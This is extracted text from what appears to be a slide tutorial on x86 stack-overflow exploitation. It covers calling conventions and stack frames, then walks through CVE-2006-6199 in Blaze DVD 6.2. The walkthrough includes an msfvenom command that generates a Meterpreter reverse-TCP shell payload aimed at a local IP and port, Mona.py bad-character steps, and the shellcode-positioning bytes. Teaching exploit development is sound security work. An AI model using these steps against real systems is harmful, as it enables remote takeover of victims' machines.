8. 8
§ FastCall
− Use ECX and EDX to pass arguments. (from left to right)
− The rest of them through the stack. (from right to left)
§ Cdecl
− Arguments are passed on the stack. (from right to left)
− Used on C and C++.
− EAX, ECX, and EDX are caller-saved
− The rest are callee-saved.
− The callee remove arguments from frame.
§ StdCall
− Callee is responsible for cleaning up the stack
− Parameters are pushed onto the stack in right-to-left order
− Used by Win32 Api Calls.
9. 9
Main Parameters
Saved EIP
Saved EBP
Modified (4 bytes)
P2 (16 bytes)
High Address
Low Address
source (4 bytes)
dest (4 bytes)
Saved EIP
Saved EBP
EBP, ESP
Main
stackframeCopyData
StackFrame
13. 13
Blaze DVD 6.2 (Latest version)
http://www.blazevideo.com/dvd-player/
CVE-2006-6199
File format Vulnerability with RCE via a Stack-Overflow.
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199
20. 20
./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=172.16.192.1 LPORT=4444 -b 'x00x0ax1a' –f perl -o
~/Exploiting/Blaze DVD Example/shellcode_perl.pl
21. 21
Badchars: Every byte that could break the shellcode.
With Mona.py
1. Obtain a badchar array:
1. !mona bytearray -b 'x00’
2. Execute the exploit with the array as a shellcode.
3. Compare memory
1. !mona compare -f C:Documents and
SettingstestEscritorioMona_resultsbytearray
22. 22
Trash_1• Separating ESP from Shellcode.
• SUB ESP,20 = x83xecx14
With Radare
High Address
Low Address
Shellcode
Trash_2
EIP
EIPESP - 20